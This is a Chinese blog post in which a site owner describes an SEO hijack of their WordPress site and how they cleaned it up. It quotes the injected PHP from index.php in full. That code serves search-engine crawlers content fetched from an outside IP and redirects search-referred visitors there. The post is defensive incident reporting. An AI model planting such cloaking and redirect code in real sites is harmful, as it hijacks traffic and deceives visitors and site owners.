1. 服务器吧首页
  2. 网站建设

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

好生气啊,服务器吧今天搜索“SEO福利”的时候,发现我的 https://seofuli.com 这个网站被恶意劫持了,唉!网站被劫持服务器吧小编也不是第一次遇到了,我在北京工作时,公司的织梦网站就被劫持过,不过最后让我将劫持代码全部删除了,可这一次网站被劫的事情又被我遇到了,我心中是一万只“CNM”在奔腾啊,要知道我的SEO福利可是用的最新版WordPress搭建的啊,要说是WordPress的漏洞问题,应该是不可能的啊,毕竟WordPress有了漏洞都会在第一时间进行修复的更新的。

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

网站被劫持修复

既然发现了网站被劫持了,那么肯定要第一时间进行修复的,于是我第一时间登陆到了SEO福利的网站根目录,开始查找网站劫持代码,原因是我没有在网站源代码里找到网站劫持代码,进入网站根目录后,我发现网站莫名其妙多了几个陌生的文件,毕竟接触WordPress不是一天两天了,他都有哪些文件,我一眼基本上就能辨别出来。

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

上图就是网站根目录里莫名多出了的一些文件,而且这些文件的日期跟网站根目录里的程序文件日期完全不同,大家可以看出来,这些文件大部分都是针对搜索引擎的文件,所以服务器吧小编觉得就是通过这些文件对SEO福利进行网站劫持的。

从上面我们看到index.php文件了没有,这个文件是WordPress的首页文件,接下来给大家看一下SEO福利网站根目录被修改后的这个文件吧。

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

从上图大家看出了什么问题没有?没有的话那大家再看看原始的WordPress网站根目里的index.php文件里的代码应该是个什么样子吧。

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

通过上面两张图片,我们可以发现WordPress网站根目里的index.php文件莫名其妙多出来了如下的一些代码,而且代码里还写着一个指定跳转的IP地址:103.117.138.132 。

<?php
header(‘Content-Type:text/html;charset=gb2312’);
$key= $_SERVER[“HTTP_USER_AGENT”];
if(strpos($key,strtolower(‘HaosouSpider’))!== false||strpos($key,strtolower(‘baidu’))!== false||strpos($key,strtolower(‘Yisou’))!== false||strpos($key,strtolower(‘Sogou’))!== false||strpos($key,strtolower(‘YisouSpider’))!== false||strpos($key,strtolower(‘360Spider’))!== false||strpos($key,strtolower(‘Baiduspide’))!== false||strpos($key,strtolower(‘Soso’))!== false )
{
date_default_timezone_set(‘PRC’);
$TD_server = “http://103.117.138.132/”;
$host_name = “http://”.$_SERVER[‘HTTP_HOST’].$_SERVER[‘PHP_SELF’];
$Content_mb=file_get_contents($TD_server.”/index.php?host=”.$host_name.”&url=”.$_SERVER[‘QUERY_STRING’].”&domain=”.$_SERVER[‘SERVER_NAME’]);

echo $Content_mb;
}

$httpuser=strtolower($_SERVER[‘HTTP_REFERER’]);
if(strstr($httpuser,’sogou’) or strstr($httpuser,’baidu’) or strstr($httpuser,’HaosouSpider’) or strstr($httpuser,’YisouSpider’))

{

Header(“Location: http://103.117.138.132/”);//指定跳转

exit;

}
?>

服务器吧小编查询了一下这个IP地址,IP地址来自香港,属于纳和云,该死的黑灰产,纳和云难道就不管这些人吗?我这里先把证据跟被修改的文件留着,后面当证据。

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

服务器吧小编也已经联系了纳和云的在线客服,并确定了该IP地址确实属于纳和(天津)网络科技有限公司,下面是相关截图。

网站根目录莫名多出了这些文件,请赶紧加固你的服务器

好了这里我们找到了我们网站被劫持的根目录文件,那么接下来就好办多了,删除这些文件,然后将index.php文件使用WordPress默认的index.php文件进行覆盖即可恢复正常了。

写在最后

截止本文发布,纳和云的在线客服还没有进一步答复服务器吧小编,后续我们还会与纳和云进行交涉,最后如果大家也遇到网站被劫持的问题的话,大家可以通过上面的办法将自己的网站进行一下恢复,并对网站服务器进行加固,另外劝大家及时更新自己的网站程序到最新版本,好了今天关于SEO福利网站被劫持与恢复的文章就为大家分享到这里了。

原创文章,作者:服务器租用,如若转载,请注明出处:https://www.fuwuqizuyong.cc/5422.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

0311-8343-7686

在线咨询:点击这里给我发消息

邮件:564999054@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

微信客服